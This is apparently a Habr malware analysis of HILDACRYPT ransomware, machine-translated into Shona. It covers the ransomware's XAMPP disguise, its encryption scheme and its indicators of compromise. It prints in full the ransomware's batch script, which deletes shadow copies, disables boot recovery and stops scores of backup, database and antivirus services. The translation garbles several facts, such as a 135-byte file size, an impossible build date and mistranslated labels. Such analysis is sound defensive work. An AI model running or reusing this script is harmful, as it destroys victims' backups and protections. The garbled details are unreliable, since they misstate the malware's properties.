Mhoro, Habr! Zvekare, tiri kutaura nezve yazvino vhezheni yemalware kubva muchikamu cheRansomware. HILDACRYPT chidzikinuro chitsva, nhengo yemhuri yaHilda yakawanikwa muna Nyamavhuvhu 2019, yakatumidzwa zita reNetflix katuni yakashandiswa kugovera software. Nhasi tave kujairana nehunyanzvi maficha eiyi yakagadziridzwa ransomware virus.
Mune yekutanga vhezheni yeHilda ransomware, chinongedzo kune chakatumirwa paYouTube
Static analysis
Rudzikinuro rwuri muPE32 .NET faira rakanyorerwa MS Windows. Hukuru hwayo i135 bytes. Ose ari maviri makuru kodhi kodhi uye yekudzivirira chirongwa kodhi yakanyorwa muC #. Zvinoenderana nezuva rekubatanidza uye chitambi chenguva, iyo bhinari yakagadzirwa munaGunyana 168, 14.
Sekureva kweDetect It Easy, iyo ransomware inochengetedzwa uchishandisa Confuser uye ConfuserEx, asi aya maofuscators akafanana nekare, ConfuserEx chete ndiye anotsiva kuConfuser, saka masaini emakodhi akafanana.
HILDACRYPT yakanyatsorongedzwa neConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attack vector
Zvingangodaro, iyo ransomware yakawanikwa pane imwe yemawebhusaiti ekuronga, ichiratidzira sechirongwa chepamutemo cheXAMPP.
Iyo ketani yese yehutachiona inogona kuoneka mukati
Obfuscation
Tambo dzerudzikinuro dzinochengetwa mune encrypted fomu. Payakatangwa, HILDACRYPT inovabvisa vachishandisa Base64 uye AES-256-CBC.
Kuiswa
Chekutanga pane zvese, iyo ransomware inogadzira folda mu% AppDataRoaming% umo iyo GUID (Globally Unique Identifier) paramende inogadzirwa zvisina tsarukano. Nekuwedzera bat faira kunzvimbo ino, hutachiona hweransomware hunotanga kushandisa cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & kubuda
Inobva yatanga kuita batch script kudzima masisitimu maficha kana masevhisi.
Iyo script ine runyorwa rurefu rwemirairo inoparadza makopi emumvuri, kudzima iyo SQL server, backup uye antivirus mhinduro.
Semuenzaniso, inoedza kusabudirira kumisa Acronis Backup masevhisi. Pamusoro pezvo, inorwisa masisitimu ekuchengetedza uye antivirus mhinduro kubva kune vanotevera vatengesi: Veeam, Sophos, Kaspersky, McAfee nevamwe.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Kamwe masevhisi uye maitiro ataurwa pamusoro akadzimwa, iyo cryptolocker inounganidza ruzivo nezve ese arikuita maitiro uchishandisa iyo tasklist yekuraira kuve nechokwadi chekuti masevhisi ese anodiwa ari pasi.
Tasklist v/fo csv
Uyu murairo unoratidza rondedzero yakadzama yemaitiro ekumhanya, izvo zvinhu zvinopatsanurwa ne "," chiratidzo.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Mushure meiyi cheki, iyo ransomware inotanga iyo encryption maitiro.
Encryption
Faira encryption
HILDACRYPT inopinda nepakati pezvinhu zvese zvinowanikwa mumahard drive, kunze kweRecycle.Bin uye Reference AssembliesMicrosoft folders. Iyo yekupedzisira ine yakakosha dll, pdb, etc. mafaira e.Net maapplication anogona kukanganisa kushanda kweiyo ransomware. Kutsvaga mafaera anozovharirwa, iyo inotevera runyorwa rwezvekuwedzera inoshandiswa:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Iyo ransomware inoshandisa iyo AES-256-CBC algorithm kuvharidzira mafaera emushandisi. Saizi yakakosha ndeye 256 bits uye iyo yekutanga vector (IV) saizi ndeye 16 bytes.
Mune inotevera skrini, kukosha kwebyte_2 uye byte_1 zvakawanikwa zvisina tsarukano uchishandisa GetBytes ().
Key
IN UYE
Iyo encrypted file ine yekuwedzera HCY!.. Uyu muenzaniso wefaira rakavharidzirwa. Kiyi uye IV yataurwa pamusoro zvakagadzirirwa iyi faira.
Key encryption
Iyo cryptolocker inochengetedza iyo yakagadzirwa AES kiyi mune yakavharidzirwa faira. Chikamu chekutanga chefaira chakavharidzirwa chine musoro une data yakadai seHILDACRYPT, KEY, IV, FileLen mu XML format, uye inoita seizvi:
AES uye IV kiyi encryption inoitwa uchishandisa RSA-2048, uye encoding inoitwa uchishandisa Base64. Iyo RSA yeruzhinji kiyi inochengetwa mumuviri wekriptolocker mune imwe yeakavharidzirwa tambo mune XML fomati.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Kiyi yeruzhinji yeRSA inoshandiswa encrypt kiyi yefaira reAES. RSA public key is Base64 encoded uye ine modulus uye mutsigiri weruzhinji we65537. Decryption inoda RSA private key, iyo anorwisa.
Mushure meRSA encryption, kiyi yeAES yakavharidzirwa uchishandisa Base64 yakachengetwa mufaira rakavharidzirwa.
Shoko rorudzikinuro
Kana encryption yapera, HILDACRYPT inonyora iyo html faira kune iyo folda iyo yakavharira mafaera. Iyo ransomware ziviso ine maviri email kero uko munhu akabatwa anogona kubata munhu anorwisa.
Chiziviso chekubira chinewo mutsara wekuti "No loli yakachengeteka;)" - chirevo kune anime uye manga mavara ane chitarisiko chevasikana vadiki vakarambidzwa muJapan.
mhedziso
HILDACRYPT, mhuri itsva yerudzikinuro, yakaburitsa vhezheni itsva. Iyo encryption modhi inodzivirira munhu akabatwa kubva pakudhipfata mafaera akavharidzirwa neiyo ransomware. Cryptolocker inoshandisa nzira dzekudzivirira dzinoshanda kudzima masevhisi ekudzivirira ane chekuita negadziriro yeparutivi uye antivirus mhinduro. Munyori weHILDACRYPT fan weiyo animated series Hilda inoratidzwa paNetflix, chinongedzo chetrailer chaive mutsamba yekutenga yeiyo yapfuura vhezheni yechirongwa.
Senguva dzose,
Zviratidzo zvekukanganisa
Faira yekuwedzera HCY!
HILDACRYPTReadMe.html
xamp.exe ine tsamba imwe "p" uye isina siginecha yedhijitari
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com